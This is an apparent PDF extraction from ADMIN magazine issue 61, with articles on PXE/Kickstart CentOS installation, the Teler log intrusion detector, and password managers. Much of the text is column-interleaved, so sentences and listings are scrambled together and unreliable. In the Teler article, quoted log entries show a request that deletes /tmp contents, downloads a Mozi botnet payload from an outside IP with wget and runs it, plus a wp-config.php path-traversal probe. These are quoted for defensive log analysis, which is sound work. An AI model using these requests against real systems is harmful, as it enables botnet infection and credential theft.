A prebuilt Ansible role for this job, directly from the Ansible developers, works wonderfully on CentOS systems. Just clone the role into the roles/ folder:

$ cd roles
$ git clone https://github.com/nginxinc/ansible-role-nginx nginxinc.nginx

After that, open the host_vars/<Hostname>.yml file again and save the configuration for Nginx (Listing 2). The entry for server_name needs to match the full hostname of the infrastructure system.
Now add the nginxinc.nginx role you cloned to the infra.yml playbook and execute the ansible-playbook command again. The most important point here is that the /srv/data/ folder is created on the infrastructure node, either manually or by the playbook. The folder needs to belong to the nginx user and the nginx group so that Nginx can access it.

Listing 2: Nginx Configuration

nginx_http_template_enable: true
nginx_http_template:
  default:
    template_file: http/default.conf.j2
    conf_file_name: default.conf
    conf_file_location: /etc/nginx/conf.d/
    servers:
      server1:
        listen:
          listen_localhost:
            port: 80
        server_name: infrastructure.cloud.internal
        autoindex: true
        web_server:
          locations:
            default:
              location: /
              html_file_location: /srv/data
              autoindex: true

Enabling PXE Boot

A specific series of commands enables PXE booting of the systems. Here, I assume that the unified extensible firmware interface (UEFI) with the secure boot function is enabled on the target systems.
The boot process will later proceed as follows: Configure the system with the intelligent platform management interface (IPMI) – or manually – for a network or PXE boot. The system then first sends a DHCP request; the DHCP response also contains the file name of the bootloader. The PXE firmware of the network card queries this and, once it has loaded the bootloader locally, executes it. The bootloader then reloads its configuration file.
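The first step of that sequence can be automated as well. As a sketch, on servers whose baseboard management controller speaks IPMI, ipmitool can request a one-time UEFI PXE boot; the BMC address and credentials here are placeholders:

ipmitool -I lanplus -H bmc.example.com -U admin -P secret chassis bootdev pxe options=efiboot
ipmitool -I lanplus -H bmc.example.com -U admin -P secret chassis power cycle

The options=efiboot flag requests a UEFI rather than a legacy BIOS network boot, matching the secure boot assumption made above.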


Depending on the requesting MAC address, the bootloader configuration can be influenced, which is very important for the configuration of the finished system. First, however, you will be interested in configuring the basics of the whole process. Conveniently, the chosen DHCP role already configured the DHCP server to always deliver pxelinux/shimx64.efi as the filename for the bootloader to UEFI systems.
In the first step, create under /var/lib/tftpboot/ the pxelinux/ subdirectory; then, create the centos8/ and pxelinux.cfg/ subdirectories below that. Next, copy the /boot/efi/EFI/centos/shimx64.efi file to the pxelinux/ folder. If it is not in place, also install the shim-x64 package.
The pxelinux/ folder also needs to contain the grubx64.efi file, which you will find online [3]. While you are on the CentOS mirror, you can load the two files found in the pxeboot directory (initrd.img and vmlinuz) [4] and store them in pxelinux/centos8/.
Still missing is a configuration file for GRUB that tells it which kernel to use. In the pxelinux/ folder, store the grub.cfg file, which follows the pattern shown in Listing 3. If you were to run a server through the PXE boot process now, it would get a bootloader, a kernel, and an initramfs. However, the Kickstart file (Listing 4) is still missing.
If you want to know which format the password in the user (line 21) and rootpw (line 13) lines must have, you can find corresponding information online [5]. Save the file as ks.cfg in the /srv/data/kickstart/ directory on the infrastructure host; then, set the permissions to 0755 so that Nginx can access the file.
access the file. GRUB bootloader does not first
After completing this step, you will be search for the grub.cfg file, but set timeout=10
able to PXE boot a 64-bit system with for a file named grub.cfg‑01‑<MAC_
menuentry 'Install CentOS 8' ‑‑class centos ‑‑class
UEFI and secure boot enabled. How- for_requesting_NIC> (e.g., grub.
gnu‑linux ‑‑class gnu ‑‑class os {
ever, at the moment, you will encoun- cfg‑01‑0c‑42‑a1‑06‑ab‑ef). With the linuxefi pxelinux/centos8/vmlinuz devfs=nomount
ter one catch: The installed systems inst.ks parameter, you define which method=http://mirror.centos.org/centos/8/BaseOS/
want to pick up their IP addresses Kickstart file the client sees after x86_64/os inst.ks=http://172.23.48.31/kickstart/
over DHCP, and the default Kickstart starting the installer. ks.cfg
template assumes that all servers use In the example here, the GRUB config- initrdefi pxelinux/centos8/initrd.img
}
the same hardware layout. uration could contain the parameter:

Listing 4: Sample Kickstart Config


01 ignoredisk ‑‑only‑use=sda 24 bootloader ‑‑location=mbr ‑‑boot‑drive=sda ‑‑driveorder=sda
02 # Use text install 25 clearpart ‑‑all ‑‑initlabel ‑‑drives=sda
03 text 26 part pv.470 ‑‑fstype="lvmpv" ‑‑ondisk=sda ‑‑size 1 ‑‑grow
04 # Keyboard layouts 27 part /boot ‑‑size 512 ‑‑asprimary ‑‑fstype=ext4 ‑‑ondisk=sda
05 keyboard ‑‑vckeymap=at‑nodeadkeys ‑‑xlayouts='de (nodeadkeys)','us' 28 volgroup cl ‑‑pesize=4096 pv.470
06 # System language 29 logvol /var ‑‑fstype="xfs" ‑‑size=10240 ‑‑name=var ‑‑vgname=cl
07 lang en_US.UTF‑8 30 logvol / ‑‑fstype="xfs" ‑‑size=10240 ‑‑name=root ‑‑vgname=cl
08 # Network information 31 logvol swap ‑‑fstype="swap" ‑‑size=4096 ‑‑name=swap ‑‑vgname=cl
32 reboot
09 network ‑‑device=bond0 ‑‑bondslaves=ens1f0,ens1f1
33
‑‑bondopts=mode=802.3ad,miimon‑100 ‑‑bootproto=dhcp ‑‑activate
34 %packages
10 network ‑‑hostname=server.cloud.internal
35 @^server‑product‑environment
11 network ‑‑nameserver=10.42.0.10,10.42.0.11
36 kexec‑tools
12 # Root password
37 %end
13 rootpw ‑‑iscrypted <Password>
38
14 # Run the Setup Agent on first boot
39 %addon com_redhat_kdump ‑‑enable ‑‑reserve‑mb='auto'
15 firstboot ‑‑enable
40 %end
16 # Do not configure the X Window System
41
17 skipx 42 %anaconda
18 # System timezone 43 pwpolicy root ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
19 timezone Europe/Vienna ‑‑isUtc ‑‑ntpservers 172.23.48.8,172.23.48.9 ‑‑notempty
20 # user setup 44 pwpolicy user ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
21 user ‑‑name=example‑user ‑‑password=<Password> ‑‑iscrypted ‑‑emptyok
‑‑gecos="example‑user" 45 pwpolicy luks ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
22 # Disk partitioning information ‑‑notempty
23 zerombr 46 %end

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 69
M A N AG E M E N T Auto Install with PXE

variant specifically geared for the method or inst.ks in the kernel com- Netbox, a tool that has already been
host. You can then follow the Ana- mand line (Figure 4). discussed several times in ADMIN [7],
conda manual if you want to config- If you have prepared an Anaconda is a combined datacenter inventory
ure static IP addresses. configuration, you can look forward management (DCIM) and IP address
In this context it is helpful to think to finding a system with the appropri- management (IPAM) system. Netbox
of a mechanism to put both the ate parameters afterward. The Ana- (Figure 5) lists the servers in your
required grub.cfg files and the Kick- conda template I looked at here by no data center, as well as the IPs of
start files in place. Ansible’s tem- means exhausts all of the program’s your various network interface cards
plate functions can help enormously possibilities. You could also configure (NICs). If you take this to its ultimate
here; then, you can build your own sudo in Anaconda or store an SSH conclusion, you can generate the
role containing a template for grub. key for users so that a login without configuration file for the DHCP server
cfg and ks.cfg and store the param- a password works. However, I advise from Netbox, as well as the Kickstart
eters to use for each host in your you to design your Kickstart tem- files for individual systems.
configuration in the two templates. plates to be as clear-cut and simple Extracting individual values from
Afterward, you would use the tem‑ as possible and leave the rest to an Netbox is not at all complicated
plate function in Ansible to put the automation expert. because the service comes with a
populated files in the right place on REST API that can be queried au-
the filesystem. For each host stored Extending the Setup tomatically. What’s more, a library
in the Ansible configuration, you acts as a Netbox client especially
would always have a functional,
Retroactively for Python so that values can be
permanently stored autoinstallation Up to this point, this article has queried from Netbox and processed
configuration. You will find more worked out how you can convert directly in a Python script. Anyone
details of this in the Anaconda docu- bare metal into an installed base planning a really big leap in auto-
mentation [6]. system. Although automation is mation will be looking to move in
good, more automation is even bet- this direction and will ultimately
Postinstallation Process ter. What you therefore need is to use tags in Netbox to assign specific
implement the last small piece of tasks to certain systems.
The main actor in the process (Ana- the installed basic system up to the A Netbox client that regularly queries
conda) has only been implicitly men- step where the system automatically the parameters of the servers in Net-
tioned thus far, but the credit goes becomes part of the automation. In box can then generate specific Kick-
to Anaconda, which is part of the Ansible-speak, this objective would start files according to these details
CentOS and RHEL initramfs files and be met once a host automatically ap- and ensure that, for example, a spe-
automatically appears as soon as you peared in the Ansible inventory after cial set of packages is rolled out on
specify an Anaconda parameter like the basic installation. one system but not on another. The
overhead is rewarded with a work-
flow in which you simply bolt a com-
puter into the rack, enter it in Netbox,
and tag it appropriately to complete
the installation in a completely auto-
mated process.
If you want things to be a little less
complicated, you might be satisfied
with an intermediate stage. Many au-
tomators, including Ansible, can now
generate their inventory directly from
Netbox. As soon as a system appears
in Netbox, it is also present in the
inventory of an environment, and the
next Ansible run would include that
new server.

Conclusions
Installing Red Hat or CentOS au-
tomatically with standard tools is
Figure 4: Anaconda either runs at the command line or graphically, but it does not affect neither rocket science nor a task
the installed system. that requires complex frameworks.

70 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Auto Install with PXE M A N AG E M E N T

If you are confident working at the as Netbox with an API that can be BaseOS/x86_64/os/images/pxeboot/]
console, you will have no problems queried prove to be extremely useful, [5] Passwords in Anaconda:
whatsoever setting up the necessary even if their initial setup is often [https://thornelabs.net/posts/hash-roots-
components. difficult and tedious. n password-in-rhel-and-centos-kickstart-
Combining the automation in your profiles.html]
own setup with Anaconda so that Info [6] Anaconda installs:
newly installed systems become part [1] DRBD on CentOS: [https://www. [https://docs.fedoraproject.org/en-US/
of your automation is also useful. howtoforge.com/tutorial/how-to-install- fedora/rawhide/install-guide/install/
Although Kickstart files provide sec- and-setup-drbd-on-centos-6/] Installing_Using_Anaconda/]
tions for arbitrary shell commands [2] “Automated Monitoring with Pacemaker [7] Netbox: [https://www.admin-magazine.
that need to be called before, during, Resource Agents” by Martin Loschwitz, com/content/search?SearchText=Netbox&
or after the installation, in theory, Linux Magazine, issue 139, June 2012, pg. x=0&y=0]
even configuration files of arbitrary 14, [https://www.linuxpromagazine.com/
programs can be rolled out in this Issues/2012/139/Pacemaker] The Author
way. In practice, however, it is a [3] grubx64.efi: [http://mirror.centos.org/ Martin Gerhard Loschwitz is Cloud Platform
good idea to leave this work to au- centos/8/BaseOS/x86_64/os/EFI/BOOT/] Architect at Drei Austria (Vienna) and works
tomation engineers who specialize [4] CentOS pxeboot files: on topics such as OpenStack, Kubernetes,
in the task. Inventory systems such [http://mirror.centos.org/centos/8/ and Ceph.

Figure 5: Netbox is a combination of DCIM and IPAM and complements the combination of DHCP, TFTP, and HTTP.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 71
M A N AG E M E N T Teler

Real-time log inspection

Inspector General
Teler is an intrusion detection and threat alert command-line tool that analyzes logs and identifies
suspicious activity in real time. By Chris Binnie

A perennial problem for any system On Your Marks for latest tag
operator is sifting through mountains kitabisa/teler info found version: 0.0.4 U

of logfiles that contain entries of To begin, I look at how you can in- for v0.0.4/linux/amd64
importance. However, when you’re stall Teler by a very simple route with kitabisa/teler info installed U

presented with half a million lines in a a precompiled binary; then, I’ll look /usr/local/bin/teler
single logfile full of differing content, at running it across some web server
you have little hope of spotting attack logs that I have to hand. As you can see from the output of
data that may be of concern or, in fact, The prebuilt binary route can be in- the command, the tool was installed
partially or completely successful. stalled in one of two ways: in the expected path. To check
Numerous tools can help you sort the 1. by visiting the release page on it further, run the check version
wheat from the chaff in logfiles, such GitHub [3] and choosing the cor- command,
as the daily reporting provided by rect binary for your system, or
the excellent Logwatch [1]. Although 2. with the use of a handy instal- $ teler ‑v
these tools are ideal for a small num- lation script that pulls down the teler 0.0.4
ber of entries, few offer analysis in binary and then saves it to your
real time with the sophistication of user path (in this case, /usr/lo‑ and to see the help options, use the
Teler, a “real-time HTTP intrusion de- cal/bin). ‑h switch (Figure 1).
tection” tool [2]. If you choose the second method, for You can also build the binary yourself
Judging by the age of the commits on prudence, you should download the from source:
its GitHub page, it’s a relatively new script first with curl (to scrutinize the
project, but I found its uncomplicated script for malicious intent, omit the $ git clone U

ingenuity exceptionally intriguing. If section after the pipe (|) before run- https://github.com/kitabisa/teler
Lead Image © bowie15, 123RF

you visit the GitHub page, you can ning it in its entirety): $ cd teler
see multiple command-line screen $ make build
recordings of Teler in action to whet $ curl ‑sSfL U $ mv ./bin/teler /usr/local/bin
your appetite. In this article, I look at 'https://ktbs.dev/get‑teler.sh' | U

installation options and use cases for sh ‑s ‑‑ ‑b /usr/local/bin I have to admit that I had less luck
the excellent Teler. kitabisa/teler info checking GitHub U trying to use the Docker container

72 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Teler M A N AG E M E N T

Teler if you get the Docker command


working:

$ cat apache.log | docker run ‑i ‑‑rm ‑e U

TELER_CONFIG=./teler.yaml kitabisa/teler

I will leave you to get the container


route working and instead use the
prebuilt binary.

Expanding The Horizon


The most important thing to get cor-
rect with Teler is the configuration side
of things. A suitably named example
file is available online [5]. If you look
at the top stanza of that file, you will
see that you are dutifully directed to a
Figure 1: The help output from Teler, in hand with some welcome ASCII art. GitHub page for the configuration sec-
tion, followed by the log format you
as the installation route. I confirmed Docker command to include an envi- want to inspect (Listing 1).
that the container was valid, but the ronment variable, Within the configuration section of
way it was built meant I couldn’t the documentation, you are offered
execute commands inside a running $ docker run ‑i ‑‑rm ‑e TELER_CONFIG=U a number of popular logfile formats.
container easily to see what I was /root/teler.yaml kitabisa/teler U More than 20 years ago I remember
missing, in terms of passing config- ‑i apache.log some of the standardization issues
uration to the binary correctly. I did with the web server logging format
manage to get some meaningful er- where the ‑i (input) switch is a prere- and wrangling with some applica-
rors back from the binary inside the corded logfile or logfiles. tions that should have supported
container, but ultimately, I didn’t You can also buffer real-time data to the NCSA format (named after the
want to spend too much
time on it. Listing 1: teler.example.yaml (partial)
If you go down that route,
# To write log format, see https://github.com/kitabisa/teler#configuration
you will probably want to
log_format: |
install Docker Engine Com- $remote_addr ‑ [$remote_addr] $remote_user ‑ [$time_local]
munity Edition and follow "$request_method $request_uri $request_protocol" $status $body_bytes_sent
the official instructions [4] "$http_referer" "$http_user_agent" $request_length $request_time
to get started. You can then [$proxy_upstream_name] $upstream_addr $upstream_response_length $upstream_response_time $upstream_status $req_id
start by pulling the relevant
container image with the
command: Listing 2: Teler Rule Options

rules:
$ docker pull kitabisa/teler cache: true
threat:
To tell the container the lo- excludes:
cation of the configuration # ‑ "Common Web Attack"
file, you can use either the # ‑ "Bad IP Address"
command, # ‑ "Bad Referrer"
# ‑ "Bad Crawler"
$ export U # ‑ "Directory Bruteforce"

TELER_CONFIG="/root/teler.yaml"
# It can be user‑agent, request path, HTTP referrer, IP address and/or request query values parsed in regExp
whitelists:
a shell-wide environment
# ‑ "(curl|Go‑http‑client|okhttp)/*"
variable (sometimes this # ‑ "^/wp‑login\\.php"
path refers internally to a # ‑ "https://www\\.facebook\\.com"
container path, so it might # ‑ "192\\.168\\.0\\.1"
not work as expected), or the

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 73
M A N AG E M E N T Teler

National Center for Supercomput- to Teller resource collections, where create the correct log_format entry, I
ing Applications) [6]. These days, you can see a list of projects (Fig- just walked through each component
however, along with a little help from ure 2) that assisted in the intelligence of that line and matched the format
the documentation, of course, it’s feed that powers Teler, along with the shown, making sure that double
possible to pin down logfiles for the author’s gratitude for their involve- quotes were present where needed.
following applications and services ment in the project in whatever form Watch out, though, because they’re
for relatively easy use with Teler: that takes. not always there.
Apache, Nginx, Nginx Ingress, AWS Having pointed the trusty Teler at that
S3, AWS Elastic Load Balancers, and Dropping Science logfile, I was a little surprised at how
AWS CloudFront. much data was reported back. In Fig-
Teler has been carefully constructed, Now that you have seen how to in- ure 3 you can see the very top of the
and if it’s starting out its develop- stall and where to configure Teler, output from the command:
ment with support for numerous ap- you can try running Teler with your
plications and services, it would be configuration file, having adapted the $ teler ‑i apache.log ‑c teler.yml U

wise to watch this space for future one from the GitHub repository [5]. ‑o threats.txt
versions. Save your configuration file locally as
Listing 2 shows off the settings avail- teler.yml (my preference on Linux is I chose to output to a file called
able for applying various rules to the shortened filename extension). threats.txt in addition to STDOUT.
logfile inspection. As you can see, Listing 3 shows the configuration The redacted output is missing the IP
it’s possible to whitelist and ignore file that I created, replacing the top addresses and is obviously not a clear
certain entries parsed by Teler and stanza with my specific Apache log- example of how rapidly the excellent
exclude certain findings within your file format. Teler can process web server logs.
logfiles. That the first line in Listing 3 is all To give you an idea of what to expect
Another option caches rules in the one long line is not precisely clear. from Teler and how useful it can be
YAML file: It’s commented out for reference. To for spotting HTTP-related attacks, I’ll

rules:
cache: true

The documentation says that if you


do not want Teler to look up what it
calls “external resources” each time
it runs, you should enable the above
caching. I found it a little unneces-
sary for testing and kept wiping the
cache clean before trying something
else with the command:
Figure 2: These projects help update the Teler intelligence feed [7].
$ teler ‑‑rm‑cache

A note in the docs ex-


plains that the cache
of information will be
updated once a day
if cache: true is en-
abled. To understand
the purpose of external
resources related to the
cache, you are pointed Figure 3: The top part of the output analyzing the Apache logfile (redacted to protect the innocent).

Listing 3: log_format in Config File

# 68.XXX.XXX.XXX ‑ ‑ [22/Nov/2020:11:03:36 +0100] "GET /wp‑login.php HTTP/1.1"


401 673 "‑" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

log_format: |
$remote_addr ‑ ‑ [$time_local] "$request_method $request_uri $request_protocol" $status $body_bytes_sent "‑" "$http_user_agent"

74 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Teler M A N AG E M E N T

dissect some of the threats.txt file &todo=syscmdU box. If you want to experiment with
that I created with that scan. &cmd=rm+‑rf+/tmp/*;wget+U real-time log scanning – as opposed
I mentioned that Figure 3 didn’t dem- http://60.211.7.17:41606/Mozi.m+‑O+U to reading from saved logfiles – then
onstrate how quick Teler was to react /tmp/netgear;sh+netgearU the docs point you to stdbuf [8],
to the injected logfile. According to the &curpath=/&currentsetting.htm=1 which is a command to pull in data in
word count command (wc), the com- a stream:
bined input logfiles were 45,836 lines You can see the netgear.cfg file being
long, from which Teler found 10,249 probed – in fact, written to. If it was $ tail ‑f access.log | U

issues worth noting. Teler definitely being queried, it would probably be stdbuf ‑oL cut ‑d aq aq ‑f1 | uniq
moved like lightning through the pars- for useful version or exploit informa-
ing of the ca. 45K-long logfiles. tion. That request definitely does not With the tail command, it is possible
The results were unsurprising be- look good for a standard web server to format the entries into a useful lay-
cause of the traffic breakdown of the request. Moreover, because the /tmp out that scripts and other applications
sites on that quiet web server, with directory is presumably being written can use.
logs that span a long period of time to, it means it’s not a novice that has I will be keeping an eye on Teler as
in which multiple bots, nefarious crafted that request. Of course, it's new features and supported formats
scans, and crawlers would have been also possible that someone who knew are developed in later versions. n
logged. their stuff might have written the re-
The file revealed a large number of quest and less experienced miscreants
brute-force attacks that appear to be are running automated scans with it. Info
PHP related (which is enabled on that Using a command to filter out crawler [1] Logwatch: [https://www.admin‑magazine.
Apache server), such as this entry: entries, the list of interesting issues is com/Archive/2015/25/Lean‑on‑Logwatch]
reduced to 1,705: [2] Teler: [https://github.com/kitabisa/teler]
[Directory Bruteforce] U [3] Teler release page: [https://github.com/
/s?p=8f0f9570a1e1fb28f829a361441abU $ cat threats.txt | grep ‑iv Crawler | wc kitabisa/teler/releases]
&t=bfd6c7c4&h=645cd72507b5af9d66d3425 [4] Docker Engine:
I would recommend boiling down the [https://docs.docker.com/engine/install]
I also found a number of WordPress results to a manageable level or, of [5] Teler config example:
attacks, most commonly this PHP course, running Teler over live logfiles [https://github.com/kitabisa/teler/blob/
test: for instant feedback and scripting master/teler.example.yaml]
alerts. [6] Common log format: [https://en.wikipedia.
[Directory Bruteforce] /wp‑login.php After filtering down the larger file, I org/wiki/Common_Log_Format]
discovered another interesting find- [7] Teler resource collections: [https://github.
Additionally, a high number of poten- ing: com/kitabisa/teler‑resources]
tially problematic crawler issues were [8] stdbuf:
logged: [Common Web Attack: Detects basic U [https://linux.die.net/man/1/stdbuf]
directory traversal] U

[Bad Crawler] python‑requests/2.22.0 /wp‑admin/admin‑ajax.phpU Author


[Bad Crawler] Java/1.8.0_131 ?action=revslider_show_imageU Chris Binnie’s latest book, Linux Server Security:
[Bad Crawler] curl/7.29.0 &img=../wp‑config.php Hack and Defend, shows how hackers launch sophis‑
ticated attacks to compromise servers, steal data,
From the Common Web Attack intel- Teler can also output results to a file and crack complex passwords, so you can learn
ligence feed, this example stood out in JSON format (Listing 4). how to defend against such attacks. In the book, he
immediately: also shows you how to make your servers invisible,
The End Is Nigh perform penetration testing, and mitigate unwel‑
[Common Web Attack: Detects specific U come attacks. You can find out more about DevOps,
directory and path traversal] U As you have seen, Teler is a highly DevSecOps, Containers, and Linux security on his
/setup.cgi?next_file=netgear.cfgU useful addition to any security tool- website: https://www.devsecops.cc.

Listing 4: JSON Output

$ teler ‑i apache.log ‑c teler.yml ‑‑json

/","status":"200","time_local":"07/Nov/2020:22:45:20 +0000"}
{"body_bytes_sent":"5695","category":"Bad Crawler","element":"http_user_agent","http_user_agent":"Mozilla/5.0 (compatible; BLEXBot/1.0;
+http://webmeup‑crawler.com/)","remote_addr":"XXX.XXX.XXX.XXX","request_method":"GET","request_protocol":"HTTP/1.1",
"request_uri":"/","status":"200","time_local":"07/Nov/2020:23:06:25 +0000"}

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 75
N U TS A N D B O LTS Password Managers

Managing access credentials

Key Moments
Most Internet services require password-protected individual accounts. A password
manager can help you keep track of all your access credentials. By Erik Bärwaldt

Whether you need to log into an password, leading to complex pass- Many of these services only work as
online store, read your email in the words. Last, but not least, users soon an extension of the web browser on
browser, check your account balance, forget their passwords for accounts that the client side. This makes them vul-
or upload photos to the cloud, most they rarely use, which makes access nerable to malware that compromises
services require an individual account even more difficult. the web browser as a platform. A
with authentication when accessing the To remedy this, a password manager local backup on a workstation com-
service. This raises various problems. can store essential information for the puter or an enterprise server without
Using the same passwords on multiple respective services along with your Internet-based access seems far more
accounts has long been considered a access credentials. You then typically elegant and secure than using an on-
bad idea. However, if you use a sepa- only need to remember the password line service.
rate password for each service, you can for the password manager. Of course, Password managers also often to
quickly lose track of which password developers need to effectively secure store more than just the plain vanilla
goes with which account. At the same the password manager itself. Oth- authentication data. Thanks to auto-
time, passwords need to meet certain erwise, unauthorized third parties type options, they also complete web
security requirements to resist brute will gain access to a large volume of pages with access data in a largely
force attacks. It is important to use up- individual access credentials in the automated way, saving users manual
percase and lowercase letters, numbers, event of theft. To see what current input. Different categories help keep
and special characters in a way that password managers have to offer, this track of the stored data.
prevents algorithms from cracking the article looks at four password manag-
ers: Buttercup, KeePassXC, Pasaffe, Buttercup
Not Considered and Password Safe (see also the “Not
Because there are so many password manag- Considered” box). Buttercup [5], a free, local, mul-
ers, we had to make a subjective selection tiplatform application, stores and
for this article. Many local password manag- Basic Functions retrieves access credentials both lo-
Lead Image © Marcel Goldbach, photocase.com

ers are no longer under development and cally and in the cloud. Several RPM
have therefore dropped out of the race. For A common practice among password and deb packages, as well as two
example, Gryptonite [1] (formerly GPass- managers is to offer online services AppImages, are available for instal-
word Manager) was last updated in 2015, and store credentials in the cloud, lation on Linux. The application
MyPasswords [2] in 2013, and the Python- creating potential vulnerabilities. Such supports both older 32-bit and cur-
based Loxodo [3] in 2018. Other text-based services are often commercial, and us- rent 64-bit operating systems [6].
password managers, like pass [4], are not ers do not know in detail where their Buttercup stores the user data in
covered here, because they do not provide a data ends up and what data security archives. After installation and first
graphical interface.
measures the provider takes. startup, Buttercup opens a window

76 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

The new entry now ends up in the third


pane. If you want to edit an entry later
on, select the entry and press the Edit
button at the bottom of the far right
pane. Then save the entry again, so that
Buttercup will apply the changes.
If a group contains a particularly large
number of entries, you can sort them.
To do this, press the bar symbol top
right in the entry pane and select
the sort order in the pop-up context
menu. The software arranges entries
either alphabetically (Figure 2) or
chronologically, but you can reverse
the order for both options.

Browser Integration
Figure 1: After startup, Buttercup prompts you to create an archive in a modern interface.
If you use a browser extension, But-
prompting you to create an archive in the input field that appears. Press- tercup will also fill in the access cre-
(Figure 1). ing the Enter key transfers the group to dentials directly in the web browser.
Buttercup later saves the access data the group pane. Buttercup displays all For Chromium, Firefox, and their
in the archive; the data should ideally the groups in alphabetical order. derivatives, first install the respective
be categorized. Open a file manager Then select the group to which you browser extension. After that, an icon
to create the archive, and assign a want to add entries. The group name appears in the browser toolbar to the
name and storage path for the ar- is highlighted in green. After clicking right of the URL input box.
chive. Be sure to include the .bcup on Add Entry in the pane to the right Clicking on this icon lets you inte-
extension in each instance. If you of the group view, a dialog opens on grate an existing desktop archive into
forget it, Buttercup will not create the the far right. Now enter a name for the browser extension. To do this,
archive. the entry followed by the matching click on Add Vault in the add-on dia-
Once the archive is created, the soft- access credentials. If required, you log. The routine now opens a new
ware asks you to define a master can add more information to the page and asks for the source of the
password. Then the actual program current entry by clicking the Custom archive. You can choose between vari-
interface opens (Figure 2). The main Fields link. Finally, click on Save ous clouds, local WebDAV sources,
window is divided into four vertical bottom right. and the Local File option.
panes. In the narrow pane on the far
left, Buttercup arranges the existing
archives one below another. On first
launch, only the first archive is found
in this pane.
In the second pane, you will find the
group list where Buttercup sorts the
groups that belong to the selected
archive. In the third pane, Butter-
cup lists entries that belong to the
selected group. Finally, in the fourth
pane on the far right, Buttercup
shows the contents of the selected
entry. This is where you can create
usernames, passwords, and user-
defined fields.

Contents
To fill the databases, first press the
New Group button at the bottom of the
second pane and create a new group Figure 2: Buttercup sorts the entries for bank accounts alphabetically.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 77
N U TS A N D B O LTS Password Managers

If you choose an archive, the desk-


top application generates a six-digit
authentication code in a separate
window, which you enter in the
Authorization Code field in the
browser. Then click on Connect to
Desktop (Figure 3); the desktop
application must already be open.
Finally, transfer the desired archive
from a file manager displayed by the
desktop application. Browser inte-
gration is now ready for use. If you
want to link several archives with
one add-on in the browser, repeat
the procedure.
To access the credentials, the desk-
top application must be running at
initial setup and whenever the web
browser is opened for the first time. Figure 3: A local file acts as the data archive. If desired, you can also store your data safe
In addition, you need to re-enter in WebDAV or various online services.
the master password in the web
browser to open the desired archive. to save the access credentials. If you Information Exchange
A special window is displayed to press Save, the routine opens a new
help you do this. The data stored browser tab in which you can enter Buttercup imports datasets from
in the archive can only be accessed the access data (Figure 4). several other password managers if
after completing these steps. Under Archive and Group, use the required. For this purpose, it sup-
From now on, if you call up a web- drop-down menus to select the ar- ports CSV, XML, JSON, PIT (file
site that has access credentials stored chive and group where the new entry type 1), and BCUP; you can use
in the Buttercup archive, the soft- will be stored. After saving, the data various derivatives of the CSV for-
ware will automatically fill the fields is stored in the archive and available mat depending on the source appli-
with data. To allow this to happen, for future access to the website via cation. Buttercup also uses CSV to
click on the padlock icon next to the the add-on. You can also open the export the existing data. The respec-
input line for the username and en- new entry in the desktop application tive dialogs can be opened via the
ter the name of the archive entry in for editing, if necessary. File | Import or Export menus.
the Find Entries line. Assuming that
Buttercup then displays the name of
the archive entry below, click on the
entry, and the authentication data is
automatically transferred to the web
browser fields.
The browser extension is not a stand-
alone application. To open and use
the archives, you first need to start
the desktop application (i.e., unlock
the appropriate archives using the
master password). Without this step,
the web browser plugin will only dis-
play an error message when you try
to open an archive.
To add new entries to the open
archive, you do not have to take
a detour via the desktop applica-
tion. Simply enter your username
and password for the website. The
add-on will then display a message
in the upper right corner of the
browser window, asking if you want Figure 4: Enter additional access data in the browser for later backup to the archive.

78 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

ChaCha20 algorithms, which also rely


on 256-bit keys. If you have powerful
hardware with multicore processors
and multithreading enabled, you can
also specify the number of threads to
be used in parallel in this dialog.
In the following dialog, you can
then set the master password for the
database.
Finally, you are taken to the main
KeePassXC window, which also ap-
pears if you are loading a previously
created database. At the top of the
main window, you will find the
menubar with a buttonbar below
for fast access to KeePassXC’s most
important functions.
Figure 5: KeePassXC impresses with an uncluttered interface when first launched. Below the menubar and buttonbar,
the main window is divided into
KeePassXC you can open an existing database or three panes (Figure 6). In the left
import data from third-party applica- pane, access credentials are grouped
KeePassXC [7], a community fork of tions in the welcome screen; there are by category in a tree structure. In the
the cross-platform KeePassX password separate dialogs with corresponding upper right pane, KeePassXC displays
manager, offers a graphical interface buttons for these actions. a corresponding list of the selected
and is installed locally. KeePassXC’s If you select Create new database, a group’s entries that have individual
range of functions goes far beyond that new window will open with a wizard authentication credentials. In the
of a conventional password manager. that mainly lets you to configure the lower-right pane, you will find the
The application includes a password encryption. To do so, tweak the vari- data for the selected entry. Even if
generator and an export and import ous basic settings in the Encryption you create a new database structure,
function that lets you use content in Settings dialog. this program window layout does not
other database formats across appli- To control the cryptographic configu- change.
cations. KeePassXC also has browser ration in detail, click on Advanced
integration for all common web brows- Settings in the bottom right corner. Getting Started
ers. An auto-type function ensures This opens a dialog where you can
automated entry of authentication data select an algorithm to encrypt your First, you must create at least one
from the KeePassXC database in vari- data. AES 256-bit is used by default, group. Otherwise, all the entries will
ous applications and services. but you can switch to the Twofish or end up in an unsorted mess in the tree
In addition, KeePassXC pays attention
to security. It stores all data with AES-
256 encryption, which makes it virtu-
ally impossible for unauthorized third
parties to read the secured access data.
The software is available from the re-
positories of the major Linux distribu-
tions and can easily be installed using
the corresponding graphical package
management routine. In addition, a
PPA archive is available for Ubuntu.
For the new package management
systems, Snap and AppImage, binary
archives are also available on the proj-
ect website [8], as well as a Flatpak
package on Flathub [9].
After opening KeePassXC for the first
time, you will see a clear-cut program
window (Figure 5), where you first
create a new database. Alternatively, Figure 6: KeePassXC secures access data in a clear cut way, offering instant retrieval.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 79
N U TS A N D B O LTS Password Managers

structure below the Root folder, which


quickly leads to confusion if there are
multiple entries. The Groups | New
Group menu item takes you to a dialog
that lets you create a group. Give the
